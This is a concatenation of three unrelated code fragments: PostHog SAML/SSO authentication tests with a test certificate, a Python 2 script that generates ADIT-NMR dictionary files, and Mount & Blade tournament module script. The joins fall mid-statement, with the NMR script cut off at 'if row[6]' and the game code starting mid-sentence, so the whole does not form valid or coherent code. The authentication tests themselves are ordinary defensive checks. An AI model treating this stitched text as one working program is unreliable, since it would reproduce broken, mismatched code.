self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(
response.json(),
{
"type": "validation_error",
"code": "sso_enforced",
"detail": "Password reset is disabled because SSO login is enforced for this domain.",
"attr": None,
},
)
self.assertEqual(len(mail.outbox), 0)
@patch("posthog.models.organization_domain.logger.warning")
def test_cannot_enforce_sso_without_a_license(self, mock_warning):
self.client.logout()
self.license.valid_until = timezone.now() - datetime.timedelta(days=1)
self.license.save()
self.create_enforced_domain()
# Enforcement is ignored
with self.settings(**GOOGLE_MOCK_SETTINGS):
response = self.client.post("/api/login", {"email": self.CONFIG_EMAIL, "password": self.CONFIG_PASSWORD})
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.json(), {"success": True})
# Attempting to use SAML fails
with self.settings(**GOOGLE_MOCK_SETTINGS):
response = self.client.get("/login/google-oauth2/")
self.assertEqual(response.status_code, status.HTTP_302_FOUND)
self.assertIn("/login?error_code=improperly_configured_sso", response.headers["Location"])
# Ensure warning is properly logged for debugging
mock_warning.assert_called_with(
"🤑🚪 SSO is enforced for domain posthog.com but the organization does not have the proper license.",
domain="posthog.com",
organization=str(self.organization.id),
)
@pytest.mark.skip_on_multitenancy
@override_settings(**SAML_MOCK_SETTINGS)
class TestEESAMLAuthenticationAPI(APILicensedTest):
CONFIG_AUTO_LOGIN = False
organization_domain: OrganizationDomain = None # type: ignore
@classmethod
def setUpTestData(cls):
super().setUpTestData()
cls.organization_domain = OrganizationDomain.objects.create(
domain="posthog.com",
verified_at=timezone.now(),
organization=cls.organization,
jit_provisioning_enabled=True,
saml_entity_id="http://www.okta.com/exk1ijlhixJxpyEBZ5d7",
saml_acs_url="https://idp.hogflix.io/saml",
saml_x509_cert="""<KEY>
A1UECAwKQ2FsaWZ<KEY>WMBQGA1UEBwwNU2FuIEZyYW5jaXNjbzENMAsGA1UECgwET2t0YTEU
MBIGA1UECwwLU1NPUHJvdmlkZXIxFTATBgNVBAMMDGRldi0xMzU1NDU1NDEcMBoGCSqGSIb3DQEJ
ARYNaW5mb0Bva3RhLmNvbTAeFw0yMTA4MjExMTIyMjNaFw0zMTA4MjExMTIzMjNaMIGUMQswCQYD
VQQGEwJVUzETMBEGA1UECAwKQ2FsaWZvcm5pYTEWMBQGA1UEBwwNU2FuIEZyYW5jaXNjbzENMAsG
A1UECgwET2t0YTEUMBIGA1UECwwLU1NPUHJvdmlkZXIxFTATBgNVBAMMDGRldi0xMzU1NDU1NDEc
MBoGCSqGSIb3DQEJARYNaW5mb0Bva3RhLmNvbTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoC
ggEBAMb1IcGzor7mGsGR0AsyzQaT0O9S1SVvdkG3z2duEU/I/a4fvaECm9xvVH7TY+RwwXcnkMst
+ZZJVkTtnUGLn0oSbcwJ1iJwWNOctaNlaJtPDLvJTJpFB857D2tU01/zPn8UpBebX8tJSIcvnvyO
Iblums97f9tlsI9GHqX5N1e1TxRg6FB2ba46mgb0EdzLtPxdYDVf8b5+V0EWp0fu5nbu5T4T+1Tq
IVj2F1xwFTdsHnzh7FP92ohRRl8WQuC1BjAJTagGmgtfxQk2MW0Ti7Dl0Ejcwcjp7ezbyOgWLBmA
fJ/Sg/MyEX11+4H+VQ8bGwIYtTM2Hc+W6gnhg4IdIfcCAwEAATANBgkqhkiG9w0BAQsFAAOCAQEA
Ef8AeVm+rbrDqil8GwZz/6mTeSHeJgsYZhJqCsaVkRPe03+NO93fRt28vlDQoz9alzA1I1ikjmfB
W/+x2dFPThR1/G4zGfF5pwU13gW1fse0/bO564f6LrmWYawL8SzwGbtelc9DxPN1X5g8Qk+j4DNm
jSjV4Oxsv3ogajnnGYGv22iBgS1qccK/cg41YkpgfP36HbiwA10xjUMv5zs97Ljep4ejp6yoKrGL
dcKmj4EG6bfcI3KY6wK46JoogXZdHDaFP+WOJNj/pJ165hYsYLcqkJktj/rEgGQmqAXWPOXHmFJb
5FPleoJTchctnzUw+QfmSsLWQ838/<KEY>==""",
)
# SAML Metadata
def test_can_get_saml_metadata(self):
self.client.force_login(self.user)
OrganizationMembership.objects.filter(organization=self.organization, user=self.user).update(
level=OrganizationMembership.Level.ADMIN
)
response = self.client.get("/api/saml/metadata/")
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue("/complete/saml/" in response.content.decode())
def test_need_to_be_authenticated_to_get_saml_metadata(self):
response = self.client.get("/api/saml/metadata/")
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
self.assertEqual(response.json(), self.unauthenticated_response())
def test_only_admins_can_get_saml_metadata(self):
self.client.force_login(self.user)
response = self.client.get("/api/saml/metadata/")
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertEqual(
response.json(),
self.permission_denied_response("You need to be an administrator or owner to access this resource."),
)
# Login precheck
def test_login_precheck_with_available_but_unenforced_saml(self):
response = self.client.post(
"/api/login/precheck", {"email": "<EMAIL>"}
) # Note Google OAuth is not configured
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.json(), {"sso_enforcement": None, "saml_available": True})
# Initiate SAML flow
def test_can_initiate_saml_flow(self):
response = self.client.get("/login/saml/?email=<EMAIL>")
self.assertEqual(response.status_code, status.HTTP_302_FOUND)
# Assert user is redirected to the IdP's login page
location = response.headers["Location"]
self.assertIn("https://idp.hogflix.io/saml?SAMLRequest=", location)
def test_cannot_initiate_saml_flow_without_target_email_address(self):
"""
We need the email address to know how to route the SAML request.
"""
with self.assertRaises(AuthMissingParameter) as e:
self.client.get("/login/saml/")
self.assertEqual(str(e.exception), "Missing needed parameter email")
def test_cannot_initiate_saml_flow_for_unconfigured_domain(self):
"""
SAML settings have not been configured for the domain.
"""
with self.assertRaises(AuthFailed) as e:
self.client.get("/login/saml/?email=<EMAIL>")
self.assertEqual(str(e.exception), "Authentication failed: SAML not configured for this user.")
def test_cannot_initiate_saml_flow_for_unverified_domain(self):
"""
Domain is unverified.
"""
self.organization_domain.verified_at = None
self.organization_domain.save()
with self.assertRaises(AuthFailed) as e:
self.client.get("/login/saml/?email=<EMAIL>")
self.assertEqual(str(e.exception), "Authentication failed: SAML not configured for this user.")
# Finish SAML flow (i.e. actual log in)
@freeze_time("2021-08-25T22:09:14.252Z") # Ensures the SAML timestamp validation passes
def test_can_login_with_saml(self):
user = User.objects.create(email="<EMAIL>", distinct_id=str(uuid.uuid4()))
response = self.client.get("/login/saml/?email=<EMAIL>")
self.assertEqual(response.status_code, status.HTTP_302_FOUND)
_session = self.client.session
_session.update(
{"saml_state": "ONELOGIN_87856a50b5490e643b1ebef9cb5bf6e78225a3c6",}
)
_session.save()
f = open(os.path.join(CURRENT_FOLDER, "fixtures/saml_login_response"), "r")
saml_response = f.read()
f.close()
response = self.client.post(
"/complete/saml/",
{"SAMLResponse": saml_response, "RelayState": str(self.organization_domain.id)},
follow=True,
format="multipart",
)
self.assertEqual(response.status_code, status.HTTP_200_OK) # because `follow=True`
self.assertRedirects(response, "/") # redirect to the home page
# Ensure proper user was assigned
_session = self.client.session
self.assertEqual(_session.get("_auth_user_id"), str(user.pk))
# Test logged in request
response = self.client.get("/api/users/@me/")
self.assertEqual(response.status_code, status.HTTP_200_OK)
@freeze_time("2021-08-25T23:37:55.345Z")
def test_saml_jit_provisioning_and_assertion_with_different_attribute_names(self):
"""
Tests JIT provisioning for creating a user account on the fly.
In addition, tests that the user can log in when the SAML response contains attribute names in one of their alternative forms.
For example in this case we receive the user's first name at `urn:oid:172.16.17.32` instead of `first_name`.
"""
response = self.client.get("/login/saml/?email=<EMAIL>")
self.assertEqual(response.status_code, status.HTTP_302_FOUND)
_session = self.client.session
_session.update(
{"saml_state": "ONELOGIN_87856a50b5490e643b1ebef9cb5bf6e78225a3c6",}
)
_session.save()
f = open(os.path.join(CURRENT_FOLDER, "fixtures/saml_login_response_alt_attribute_names"), "r")
saml_response = f.read()
f.close()
user_count = User.objects.count()
response = self.client.post(
"/complete/saml/",
{"SAMLResponse": saml_response, "RelayState": str(self.organization_domain.id)},
format="multipart",
follow=True,
)
self.assertEqual(response.status_code, status.HTTP_200_OK) # because `follow=True`
self.assertRedirects(response, "/") # redirect to the home page
# User is created
self.assertEqual(User.objects.count(), user_count + 1)
user = cast(User, User.objects.last())
self.assertEqual(user.first_name, "PostHog")
self.assertEqual(user.email, "<EMAIL>")
self.assertEqual(user.organization, self.organization)
self.assertEqual(user.team, self.team)
self.assertEqual(user.organization_memberships.count(), 1)
self.assertEqual(
cast(OrganizationMembership, user.organization_memberships.first()).level,
OrganizationMembership.Level.MEMBER,
)
_session = self.client.session
self.assertEqual(_session.get("_auth_user_id"), str(user.pk))
@freeze_time("2021-08-25T22:09:14.252Z")
def test_cannot_login_with_improperly_signed_payload(self):
self.organization_domain.saml_x509_cert = """<KEY>
<KEY>"""
self.organization_domain.save()
response = self.client.get("/login/saml/?email=<EMAIL>")
self.assertEqual(response.status_code, status.HTTP_302_FOUND)
_session = self.client.session
_session.update(
{"saml_state": "ONELOGIN_87856a50b5490e643b1ebef9cb5bf6e78225a3c6",}
)
_session.save()
f = open(os.path.join(CURRENT_FOLDER, "fixtures/saml_login_response"), "r")
saml_response = f.read()
f.close()
user_count = User.objects.count()
with self.assertRaises(AuthFailed) as e:
response = self.client.post(
"/complete/saml/",
{"SAMLResponse": saml_response, "RelayState": str(self.organization_domain.id),},
format="multipart",
follow=True,
)
self.assertIn("Signature validation failed. SAML Response rejected", str(e.exception))
self.assertEqual(User.objects.count(), user_count)
# Test logged in request fails
response = self.client.get("/api/users/@me/")
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
@freeze_time("2021-08-25T22:09:14.252Z")
def test_cannot_signup_with_saml_if_jit_provisioning_is_disabled(self):
self.organization_domain.jit_provisioning_enabled = False
self.organization_domain.save()
response = self.client.get("/login/saml/?email=<EMAIL>")
self.assertEqual(response.status_code, status.HTTP_302_FOUND)
_session = self.client.session
_session.update(
{"saml_state": "ONELOGIN_87856a50b5490e643b1ebef9cb5bf6e78225a3c6",}
)
_session.save()
f = open(os.path.join(CURRENT_FOLDER, "fixtures/saml_login_response"), "r")
saml_response = f.read()
f.close()
user_count = User.objects.count()
response = self.client.post(
"/complete/saml/",
{"SAMLResponse": saml_response, "RelayState": str(self.organization_domain.id)},
format="multipart",
follow=True,
)
self.assertEqual(response.status_code, status.HTTP_200_OK) # because `follow=True`
self.assertRedirects(response, "/login?error_code=jit_not_enabled") # show the appropriate login error
# User is not created (JIT provisioning is disabled)
self.assertEqual(User.objects.count(), user_count)
# Test logged in request fails
response = self.client.get("/api/users/@me/")
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
@freeze_time("2021-08-25T23:53:51.000Z")
def test_cannot_create_account_without_first_name_in_payload(self):
response = self.client.get("/login/saml/?email=<EMAIL>")
self.assertEqual(response.status_code, status.HTTP_302_FOUND)
_session = self.client.session
_session.update(
{"saml_state": "ONELOGIN_87856a50b5490e643b1ebef9cb5bf6e78225a3c6",}
)
_session.save()
f = open(os.path.join(CURRENT_FOLDER, "fixtures/saml_login_response_no_first_name"), "r")
saml_response = f.read()
f.close()
user_count = User.objects.count()
with self.assertRaises(ValidationError) as e:
response = self.client.post(
"/complete/saml/",
{"SAMLResponse": saml_response, "RelayState": str(self.organization_domain.id)},
format="multipart",
follow=True,
)
self.assertEqual(str(e.exception), "{'name': ['This field is required and was not provided by the IdP.']}")
self.assertEqual(User.objects.count(), user_count)
@freeze_time("2021-08-25T22:09:14.252Z")
def test_cannot_login_with_saml_on_unverified_domain(self):
User.objects.create(email="<EMAIL>", distinct_id=str(uuid.uuid4()))
response = self.client.get("/login/saml/?email=<EMAIL>")
self.assertEqual(response.status_code, status.HTTP_302_FOUND)
# Note we "unverify" the domain after the initial request because we want to test the actual login process (not SAML initiation)
self.organization_domain.verified_at = None
self.organization_domain.save()
_session = self.client.session
_session.update(
{"saml_state": "ONELOGIN_87856a50b5490e643b1ebef9cb5bf6e78225a3c6",}
)
_session.save()
f = open(os.path.join(CURRENT_FOLDER, "fixtures/saml_login_response"), "r")
saml_response = f.read()
f.close()
with self.assertRaises(AuthFailed) as e:
response = self.client.post(
"/complete/saml/",
{"SAMLResponse": saml_response, "RelayState": str(self.organization_domain.id)},
follow=True,
format="multipart",
)
self.assertEqual(
str(e.exception), "Authentication failed: Authentication request is invalid. Invalid RelayState."
)
# Assert user is not logged in
response = self.client.get("/api/users/@me/")
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_saml_can_be_enforced(self):
User.objects.create_and_join(
organization=self.organization, email="<EMAIL>", password=<PASSWORD>
)
# Can log in regularly with SAML configured
response = self.client.post(
"/api/login", {"email": "<EMAIL>", "password": <PASSWORD>}
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.json(), {"success": True})
# Forcing only SAML disables regular API password login
self.organization_domain.sso_enforcement = "saml"
self.organization_domain.save()
response = self.client.post(
"/api/login", {"email": "<EMAIL>", "password": <PASSWORD>}
)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(
response.json(),
{
"type": "validation_error",
"code": "sso_enforced",
"detail": "You can only login with SSO for this account (saml).",
"attr": None,
},
)
# Login
#!/usr/bin/python -u
#
# create dictionary files for ADIT-NMR:
#
# adit_nmr_upload_tags.csv
# bmrb_1.view
# default-entry.cif (actually this one's simply copied from Eldon's svn)
# dict.cif
# mmcif_bmrb.dic
# nmrcifmatch.cif
# table_dict.str
# View-bmrb.cif
#
#
from __future__ import absolute_import
import sys
import os
import sqlite3
import ConfigParser
import datetime
import shutil
if __package__ is None :
__package__ = "nmr-star-dictionary-scripts"
sys.path.append( os.path.abspath( os.path.join( os.path.split( __file__ )[0], ".." ) ) )
from scripts import BaseClass as BaseClass
from scripts import quote4star as quote4star
else :
from . import BaseClass, quote4star
# Python rewrite of the "-ddl" part of Steve's create_schema_3
# High-level view is it's reformatting our stuff in the way ADIT will understand, but the details of
# ADIT are pretty much Double Dutch to me. So don't touch anything here, it was copy-pasted from
# Steve's code and we mostly don't know what it does or why.
#
class AditWriter( BaseClass ) :
# ADIT supports several "views" but we only use 1. Note that it's hardcoded in the bmrb_1.view filename
# in the .properties file
#
VIEWMODE = 1
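# Maps SQL column types from the dictionary database to the ADIT-NMR field type names
# used when generating the ADIT files.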
ADITNMR_TYPES = {
"DATETIME": "date:yyyy-mm-dd",
"FLOAT": "floating-point",
"DOUBLE PRECISION": "floating-point",
"INTEGER": "integer",
"TEXT": "text",
"NCHAR(2)": "2_characters_or_less",
"VARCHAR(2)": "2_characters_or_less",
"CHAR(2)": "2_characters_or_less",
"NCHAR(3)": "3_characters_or_less",
"VARCHAR(3)": "3_characters_or_less",
"CHAR(3)": "3_characters_or_less",
"NCHAR(12)": "12_characters_or_less",
"VARCHAR(12)": "12_characters_or_less",
"CHAR(12)": "12_characters_or_less",
"NCHAR(15)": "15_characters_or_less",
"VARCHAR(15)": "15_characters_or_less",
"CHAR(15)": "15_characters_or_less",
"NCHAR(31)": "31_characters_or_less",
"VARCHAR(31)": "31_characters_or_less",
"CHAR(31)": "31_characters_or_less",
"VARCHAR(80)": "80_characters_or_less",
"CHAR(80)": "80_characters_or_less",
"NCHAR(80)": "80_characters_or_less",
"VARCHAR(127)": "127_characters_or_less",
"CHAR(127)": "127_characters_or_less",
"NCHAR(127)": "127_characters_or_less",
"VARCHAR(255)": "255_characters_or_less",
"CHAR(255)": "255_characters_or_less",
"NCHAR(255)": "255_characters_or_less",
"CHAR(1024)": "1024_characters_or_less",
"NCHAR(1024)": "1024_characters_or_less",
"VARCHAR(1024)": "1024_characters_or_less",
"NCHAR(2048)": "2048_characters_or_less" ,
"VARCHAR(2048)": "2048_characters_or_less"
}
TABLEDICT_COLS = [
"dictionaryseq",
"originalcategory",
"aditCatManFlg",
"aditCatViewType",
"aditsupercatID",
"aditsupercatName",
"aditCatGrpID",
"aditCatViewName",
"aditInitialRows",
"originaltag",
"aditExists",
"aditViewFlags",
"enumeratedFlg",
"itemEnumClosedFlg",
"aditItemViewName",
"aditFormCode",
"dbtype",
"bmrbtype",
"dbnullable",
"internalflag",
"rowIndexFlg",
"lclIDFlg",
"lclSfIDFlg",
"sfIDFlg",
"sfNameFlg",
"sfCategoryFlg",
"sfPointerFlg",
"primaryKey",
"ForeignKeyGroup",
"foreigntable",
"foreigncolumn",
"indexflag",
"dbtablemanual",
"dbcolumnmanual",
"tagCategory",
"tagField",
"loopflag",
"seq",
"dbflg",
"validateflgs",
"valoverrideflgs",
"defaultValue",
"bmrbPdbMatchId",
"bmrbPdbTransFunc",
"variableTypeMatch",
"entryIdFlg",
"outputMapExistsFlg",
"aditAutoInsert",
"datumCountFlgs",
"metaDataFlgs",
"tagDeleteFlgs",
"RefKeyGroup",
"RefTable",
"RefColumn",
"example",
"help",
"description" ]
NMRCIFMATCH_COLS = [
"bmrbPdbMatchId",
"bmrbPdbTransFunc",
"tagCategory",
"tagField",
"originaltag",
"variableTypeMatch",
"entryIdFlg",
"outputMapExistsFlg" ]
# main
#
@classmethod
def make_adit_files( cls, props, connection = None, dburl = None, verbose = False ) :
obj = cls( verbose = verbose )
obj.config = props
outdir = os.path.realpath( props.get( "adit", "output_dir" ) )
if not os.path.isdir( outdir ) :
os.makedirs( outdir )
if connection is None :
obj.connect( url = dburl )
else :
obj.connection = connection
obj.make_view_files()
obj.make_dict_file()
obj.copy_extra_files()
obj.make_table_dict()
obj.make_nmrcifmatch()
return obj
#
#
def __init__( self, *args, **kwargs ) :
super( self.__class__, self ).__init__( *args, **kwargs )
self._curs = None
#### temp view files ##########################################
# these methods return an open tmpfile descriptor, should probably change it to a stringbuffer
#
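# A StringIO-based variant would look roughly like this (untested sketch):
#
#     import StringIO
#     out = StringIO.StringIO()
#     out.write( "..." )
#     out.seek( 0 )      # callers could then .read() it back like the tmpfile
#
# The os.tmpfile() approach is kept below unchanged.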
# category groups: view file
#
def temp_view_category_groups( self ) :
if self._verbose : sys.stdout.write( self.__class__.__name__ + ".temp_view_category_groups()\n" )
out = os.tmpfile()
out.write( """
#-------------- GROUP VIEWS -----------------
loop_
_ndb_view_category_group.view_group_id
_ndb_view_category_group.group_view_name
_ndb_view_category_group.group_replicable
_ndb_view_category_group.group_view_class
_ndb_view_category_group.group_view_help_text
_ndb_view_category_group.group_view_mandatory_code
_ndb_view_category_group.group_view_display_code
""" )
sql = "select g.sfCategory,g.catGrpViewName,g.aditReplicable,s.superGrpName,g.catGrpViewHelp," \
+ "g.aditViewFlgs,g.groupID " \
+ "from aditcatgrp g join aditsupergrp s on g.supergrpid = s.supergrpid " \
+ "order by g.groupID"
curs = self.connection.cursor()
curs.execute( sql )
while True :
row = curs.fetchone()
if row is None : break
if row[0] is None :
# sfcat = "" # should never happen
raise Exception( "No saveframe category in aditcatgrp!" )
sfcat = str( row[0] ).strip()
if sfcat == "" :
raise Exception( "Saveframe category is an empty string in aditcatgrp!" )
if row[1] is None : catgrpviewname = ""
else : catgrpviewname = row[1].strip()
if row[2] is None : aditreplicable = ""
else : aditreplicable = row[2].strip()
if row[3] is None : supergrpname = ""
else : supergrpname = row[3].strip()
if row[4] is None : catgrpviewhelp = ""
else : catgrpviewhelp = row[4].strip()
if row[5] is None : aditviewflgs = ""
else : aditviewflgs = row[5][self.VIEWMODE - 1]
out.write( """'%s' '%s' '%s' '%s'
;
%s
;
'%s' 'G0'
""" % (sfcat,catgrpviewname,aditreplicable,supergrpname,catgrpviewhelp,aditviewflgs) )
curs.close()
return out
###################################################
# tag categories view file
#
def temp_view_categories( self ) :
if self._verbose : sys.stdout.write( self.__class__.__name__ + ".temp_view_categories()\n" )
out = os.tmpfile()
out.write( """
#-------------- CATEGORY VIEWS --------------
loop_
_ndb_view_category.category_id
_ndb_view_category.category_view_name
_ndb_view_category.view_group_id
_ndb_view_category.category_view_mandatory_code
_ndb_view_category.category_view_display_code
_ndb_view_category.category_view_initial_rows
""" )
sql = "select tagCategory,OriginalCategory,aditCatViewName,aditCatManFlg,aditCatViewType," \
+ "aditInitialRows,min(dictionaryseq) from dict " \
+ "where upper(dbFlg)='Y' and upper(aditExists)='Y'" \
+ "group by tagCategory order by min(dictionaryseq)"
curs = self.connection.cursor()
curs.execute( sql )
while True :
row = curs.fetchone()
if row is None : break
if row[0] is None : tagcategory = ""
else : tagcategory = row[0].strip()
if row[1] is None : originalcategory = ""
else : originalcategory = row[1].strip()
if row[2] is None : aditcatviewname = ""
else : aditcatviewname = row[2].strip()
if row[3] is None : aditcatmanflg = ""
else : aditcatmanflg = row[3].strip()
if row[4] is None : aditcatviewtype = ""
else : aditcatviewtype = row[4].strip()
if row[5] is None : aditinitialrows = 1
else : aditinitialrows = int( str( row[5] ).strip() )
# Now the view file output:
out.write( "'%s'\t" % (tagcategory) )
out.write( """
;
%s
;
""" % (aditcatviewname) )
out.write( "'%s'\t" % (originalcategory) )
out.write( "'%s'\t" % (aditcatmanflg) )
out.write( "'%s'\n" % (aditcatviewtype) )
out.write( "%d\n" % (aditinitialrows) )
curs.close()
return out
###################################################
# tags: view file
# Steve's code also generated sd_* (significant digits) columns for all floating fields.
# We don't actually use them in 3.1, so I'm leaving that off.
# (The logic is: for any floating-point tag, generate one called <category>._sd_<tag>
# with flags set to H, Y, 1, N, N)
#
def temp_view_items( self ) :
if self._verbose : sys.stdout.write( self.__class__.__name__ + ".temp_view_items()\n" )
out = os.tmpfile()
out.write( """
#--------------- ITEM VIEWS -----------------
loop_
_ndb_view_item.category_id
_ndb_view_item.item_name
_ndb_view_item.item_view_name
_ndb_view_item.item_view_mandatory_code
_ndb_view_item.item_view_allow_alternate_value
_ndb_view_item.item_view_form_code
_ndb_view_item.item_sf_id_flag
_ndb_view_item.item_sf_name_flag
""" )
sql = "select tagcategory,tagfield,adititemviewname,description,aditviewflags,itemEnumClosedFlg," \
+ "aditformcode,sfidflg,sfNameflg,dictionaryseq from dict " \
+ "where upper(dbFlg)='Y' and upper(aditExists)='Y' " \
+ "order by tagcategory,dictionaryseq"
curs = self.connection.cursor()
curs.execute( sql )
while True :
row = curs.fetchone()
if row is None : break
if row[0] is None : tagcategory = ""
else : tagcategory = row[0].strip()
if row[1] is None : tagfield = ""
else : tagfield = row[1].strip()
if row[2] is None : adititemviewname = ""
else : adititemviewname = row[2].strip()
if row[3] is None : description = ""
else : description = row[3].strip()
if (adititemviewname == "na") or (adititemviewname == "") :
adititemviewname = description
if row[4] is None : aditviewflag = ""
else : aditviewflag = row[4][self.VIEWMODE - 1]
# flip this flag because it's the other way around in adit dictionary.
# apparently.
#
if row[5] is None : enumclosedflag = "Y"
elif str( row[5] ).strip().upper() == "Y" : enumclosedflag = "N"
else : enumclosedflag = "Y"
if row[6] is None : formcode = 0  # default to 0 so the "%d" write below cannot fail on nulls
else : formcode = int( str( row[6] ).strip() )
if row[7] is None : sfidflag = "N"
elif str( row[7] ).strip().upper() == "Y" : sfidflag = "Y"
else : sfidflag = "N"
if row[8] is None : sflabelflag = "N"
elif str( row[8] ).strip().upper() == "Y" : sflabelflag = "Y"
else : sflabelflag = "N"
out.write( " '%s'\t" % (tagcategory) )
out.write( "'_%s.%s'\t" % (tagcategory,tagfield) )
out.write( """
;
%s
;
""" % (adititemviewname) )
out.write( "'%s'\t" % (aditviewflag) )
out.write( "'%s'\t" % (enumclosedflag) )
out.write( "%d\t" % (formcode) )
out.write( "'%s'\t" % (sfidflag) )
out.write( "'%s'\n" % (sflabelflag) )
curs.close()
return out
###################################################
# mandatory overrides
#
def temp_view_man_overrides( self ) :
if self._verbose : sys.stdout.write( self.__class__.__name__ + ".temp_view_man_overrides()\n" )
out = os.tmpfile()
out.write( """
#-------------- MANDATORY CODE OVERRIDE ----------------
loop_
_mandatory_code_override.group
_mandatory_code_override.category_id
_mandatory_code_override.item_name
_mandatory_code_override.new_view_mandatory_code
_mandatory_code_override.conditional_category_id
_mandatory_code_override.conditional_item_name
_mandatory_code_override.conditional_item_value
""" )
sql = "select orderOfOperations,sfcategory,categoryId,itemName,newViewMandatoryCode," \
+ "conditionalCatId,conditionalItemName,conditionalItemValue from aditmanoverride " \
+ "order by orderOfOperations"
curs = self.connection.cursor()
curs.execute( sql )
while True :
row = curs.fetchone()
if row is None : break
if row[1] is None : sfcat = ""
else : sfcat = row[1].strip()
if row[2] is None : categoryid = ""
else : categoryid = row[2].strip()
if row[3] is None : itemname = ""
else : itemname = row[3].strip()
if row[4] is None : newviewmandatorycode = ""
else : newviewmandatorycode = row[4].strip()
if row[5] is None : conditionalcatid = "*"
else : conditionalcatid = row[5].strip()
if row[6]
Make sure it isn't already available & selected.
(overlay_set_val, ":conditional_obj", ":status"), # Set it to whatever it was stored as.
(overlay_set_display, ":conditional_obj", 1), # Displays the option.
(assign, ":add_option", 0),
(try_end),
## CONDITIONAL CHECKBOXES end
(try_end),
# Set to randomize or remove based on options taken.
(try_begin),
(troop_slot_ge, ":troop", slot_troop_tournament_selections, 1),
(troop_set_slot, ":troop", slot_troop_tournament_always_randomize, 1),
(else_try),
(troop_set_slot, ":troop", slot_troop_tournament_always_randomize, 0),
(try_end),
# Update display of options remaining.
(call_script, "script_tpe_update_presentation"),
(call_script, "script_tpe_weapon_logic", ":troop"), # TPE 1.3 + Limiting options panel reboots
# Update difficulty score.
(call_script, "script_tpe_get_difficulty_value"),
]
),
# script_tpe_clear_selections (blanks out troop template choices)
# Input: arg1 = troop
# Output: none
("tpe_clear_selections",
[
(store_script_param, ":troop_id", 1),
(try_for_range, ":selection", slot_troop_tournament_begin, slot_troop_tournament_end), # Clear out any previously selected options.
(troop_set_slot, ":troop_id", ":selection", 0),
(try_end),
(troop_set_slot, ":troop_id", slot_troop_tournament_selections, 0),
]),
# script_tpe_set_items_for_tournament
# Input:
# Output: none (sets mt_arena_melee_fight items)
("tpe_set_items_for_tournament",
[
(store_script_param, ":troop_id", 1),
(store_script_param, ":troop_team", 2),
(store_script_param, ":troop_entry", 3),
(try_begin),
(eq, "$g_wp_tpe_active", 1),
(assign, ":mission_template", "mt_tpe_tournament_standard"),
(try_end),
# Find the appropriate city settings.
(store_sub, ":city_settings", "$current_town", towns_begin),
(val_mul, ":city_settings", 10),
(store_add, ":slot_lance", ":city_settings", tdp_val_setting_lance),
(store_add, ":slot_archery", ":city_settings", tdp_val_setting_archery),
(store_add, ":slot_onehand", ":city_settings", tdp_val_setting_onehand),
(store_add, ":slot_twohand", ":city_settings", tdp_val_setting_twohand),
(store_add, ":slot_crossbow", ":city_settings", tdp_val_setting_crossbow),
(store_add, ":slot_throwing", ":city_settings", tdp_val_setting_throwing),
(store_add, ":slot_polearm", ":city_settings", tdp_val_setting_polearm),
(store_add, ":slot_horse", ":city_settings", tdp_val_setting_horse),
#(store_add, ":slot_outfit", ":city_settings", tdp_val_setting_outfit),
(troop_get_slot, ":item_normal_lance", tpe_appearance, ":slot_lance"),
(troop_get_slot, ":item_normal_archery", tpe_appearance, ":slot_archery"),
(troop_get_slot, ":item_normal_onehand", tpe_appearance, ":slot_onehand"),
(troop_get_slot, ":item_normal_twohand", tpe_appearance, ":slot_twohand"),
(troop_get_slot, ":item_normal_crossbow", tpe_appearance, ":slot_crossbow"),
(troop_get_slot, ":item_normal_throwing", tpe_appearance, ":slot_throwing"),
(troop_get_slot, ":item_normal_polearm", tpe_appearance, ":slot_polearm"),
(troop_get_slot, ":item_normal_horse", tpe_appearance, ":slot_horse"),
#(troop_get_slot, ":item_normal_outfit", tpe_appearance, ":slot_outfit"),
(try_begin),
(assign, ":equip_check", 0),
(neq, ":item_normal_lance", 0),
(neq, ":item_normal_archery", 0),
(neq, ":item_normal_onehand", 0),
(neq, ":item_normal_twohand", 0),
(neq, ":item_normal_crossbow", 0),
(neq, ":item_normal_throwing", 0),
(neq, ":item_normal_polearm", 0),
(neq, ":item_normal_horse", 0),
#(neq, ":item_normal_outfit", 0),
(assign, ":equip_check", 1),
(else_try),
(eq, ":equip_check", 0),
(display_message, "@ERROR (TPE Design): An invalid item type (normal weapon) is detected."),
(try_end),
(store_add, ":item_enh_lance", ":item_normal_lance", 1),
(store_add, ":item_enh_archery", ":item_normal_archery", 1),
(store_add, ":item_enh_onehand", ":item_normal_onehand", 1),
(store_add, ":item_enh_twohand", ":item_normal_twohand", 1),
(store_add, ":item_enh_crossbow", ":item_normal_crossbow", 1),
(store_add, ":item_enh_throwing", ":item_normal_throwing", 2),
(store_add, ":item_enh_polearm", ":item_normal_polearm", 1),
(store_add, ":item_enh_horse", ":item_normal_horse", 4),
#(store_add, ":item_enh_outfit", ":item_normal_outfit", 100),
(try_begin),
(assign, ":equip_check", 0),
(neq, ":item_enh_lance", 0),
(neq, ":item_enh_archery", 0),
(neq, ":item_enh_onehand", 0),
(neq, ":item_enh_twohand", 0),
(neq, ":item_enh_crossbow", 0),
(neq, ":item_enh_throwing", 0),
(neq, ":item_enh_polearm", 0),
(neq, ":item_enh_horse", 0),
#(neq, ":item_enh_outfit", 0),
(assign, ":equip_check", 1),
(else_try),
(eq, ":equip_check", 0),
(display_message, "@ERROR (TPE Design): An invalid item type (enhanced weapon) is detected."),
(try_end),
(mission_tpl_entry_clear_override_items, ":mission_template", ":troop_entry"),
(try_begin),
(ge, DEBUG_TPE_general, 3), # Verbose display on entry.
(str_store_troop_name, s1, ":troop_id"),
(assign, reg0, ":troop_team"),
(assign, reg1, ":troop_entry"),
(display_message, "@DEBUG (TPE): {s1} is on team {reg0} and should load at entry {reg1}."),
(try_end),
# Do they have any gear arranged for them?
(try_begin),
(this_or_next|troop_slot_eq, ":troop_id", slot_troop_tournament_always_randomize, 0), # checks for preset equipment settings.
